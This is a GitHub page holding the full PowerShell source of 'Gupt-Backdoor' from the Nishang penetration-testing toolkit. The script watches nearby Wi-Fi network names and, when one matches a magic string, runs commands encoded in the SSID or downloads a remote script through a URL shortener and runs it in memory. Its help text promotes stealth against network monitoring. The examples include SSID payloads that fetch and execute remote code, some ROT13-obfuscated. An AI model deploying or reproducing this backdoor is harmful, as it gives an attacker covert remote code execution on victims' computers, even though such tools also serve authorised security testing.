-
Notifications
You must be signed in to change notification settings - Fork 2.5k
/
Gupt-Backdoor.ps1
151 lines (132 loc) · 5.98 KB
/
Gupt-Backdoor.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
function Gupt-Backdoor
{
<#
.SYNOPSIS
Gupt is a backdoor in Nishang which could execute commands and scripts from specially crafted Wireless Network Names.
.DESCRIPTION
Gupt looks for a specially crafted Wireless Network Name/SSID from list of all avaliable networks. It matches first four characters of
each SSID with the parameter MagicString. On a match, if the 5th character is a 'c', rest of the SSID name is considered to be a command and
exeucted. If the 5th character is a 'u', rest of the SSID is considered the id part of Google URL Shortener and a script is downloaded and
executed in memory from the URL. See examples for usage.
Gupt does not connect to any Wireless network and this makes it more stealthy and helps in bypassing network traffic monitoring.
.PARAMETER MagicString
The string which Gupt would compare with the available SSIDs.
.PARAMETER Arguments
Arguments to pass to a downloaded script.
.PARAMETER EncodedCmd
Use this switch if the command part of the SSID name is ROT13 encoded.
.EXAMPLE
PS > Gupt-Backdoor -MagicString op3n -Verbose
In above, Gupt will look for an SSID starting with "op3n". To execute whoami on the target, the wireless network name should be "op3ncwhoami".
PS > Gupt-Backdoor -MagicString op3n -Verbose
In above, Gupt will look for an SSID starting with "op3n". To execute a PowerShell script on the target, the wireless network name should be
"op3nunJEuug". Here, Gupt will use of characters after the 5th one and make the URL http://goo.gl/nJEuug. A script hosted at the URL resolved
by the Google shortener would be downloaded and executed.
.EXAMPLE
PS > Gupt-Backdoor -MagicString op3n -Verbose
In above, Gupt will look for an SSID starting with "op3n". For PowerShell v3 and onwards, to execute a script on the target, just set the SSID
name to "op3nciex(iwr_bit.ly/2g6JbQB)" and the script will be downloaded and executed in memory on the target.
.EXAMPLE
PS > Gupt-Backdoor -MagicString op3n -Verbose -EncodedCmd
In above, Gupt will look for an SSID starting with "op3n"and rest of the command encoded with ROT13.
ConverTo-ROT13 from Nishang can be used for encoding a command.
For PowerShell v3 and onwards, to execute a script on the target, just set the SSID
name to "op3ncvrk(vje_ovg.yl/2t6WoDO)" and the script will be downloaded and executed in memory on the target.
.LINK
http://www.labofapenetrationtester.com/2014/08/Introducing-Gupt.html
https://github.com/samratashok/nishang
#>
[CmdletBinding()] Param(
[Parameter(Position=0, Mandatory = $True)]
[String]
$MagicString,
[Parameter(Position=1, Mandatory = $False)]
[String]
$Arguments,
[Parameter(Position=2, Mandatory = $False)]
[Switch]
$EncodedCmd
)
#ROT13 code From learningpcs.blogspot.com/2012/06/powershell-v2-function-convertfrom.html
function ConvertTo-ROT13
{
param(
[Parameter(Mandatory = $False)]
[String]
$rot13string
)
[String] $string = $null;
$rot13string.ToCharArray() | ForEach-Object {
if((([int] $_ -ge 97) -and ([int] $_ -le 109)) -or (([int] $_ -ge 65) -and ([int] $_ -le 77)))
{
$string += [char] ([int] $_ + 13);
}
elseif((([int] $_ -ge 110) -and ([int] $_ -le 122)) -or (([int] $_ -ge 78) -and ([int] $_ -le 90)))
{
$string += [char] ([int] $_ - 13);
}
else
{
$string += $_
}
}
$string
}
#Get list of available Wlan networks
while($True)
{
Write-Verbose "Checking wireless networks for instructions."
$networks = Invoke-Expression "netsh wlan show network"
$ssid = $networks | Select-String "SSID"
$NetworkNames = $ssid -replace ".*:" -replace " "
ForEach ($network in $NetworkNames)
{
#Check if the first four characters of our SSID matches the given MagicString
if ($network.ToString().Length -gt 4 -and $network.Substring(0,4) -match $MagicString.Substring(0,3))
{
Write-Verbose "Found a network with instructions!"
#If the netowrk SSID contains fifth chracter "u", it means rest of the SSID is a URL
if ($network.Substring(4)[0] -eq "u")
{
$PayloadURL = "http://goo.gl/" + $network.Substring(5)
Write-Verbose "Downloading the attack script at $PayloadURL and executing it in memory."
$webclient = New-Object System.Net.WebClient
Invoke-Expression $webclient.DownloadString($PayloadURL)
if ($Arguments)
{
Invoke-Expression $Arguments
}
Start-Sleep -Seconds 10
}
elseif ($network.Substring(4)[0] -eq "c")
{
if ($EncodedCmd -eq $True)
{
$cmd = ConvertTo-ROT13 -rot13string $network.Substring(5)
}
else
{
$cmd = $network.Substring(5)
}
if ($cmd -eq "exit")
{
break
}
if ($PSVersionTable.PSVersion.Major -ge 3)
{
Write-Verbose "PowerShell v3 or above in use. Downloading the attack script at $PayloadURL and executing it in memory."
Invoke-Expression ($cmd -replace '_',' ')
Start-Sleep -Seconds 10
}
else
{
Write-Verbose "Command `"$cmd`" found. Executing it."
Invoke-Expression $cmd
Start-Sleep -Seconds 10
}
}
}
}
Start-Sleep -Seconds 5
}
}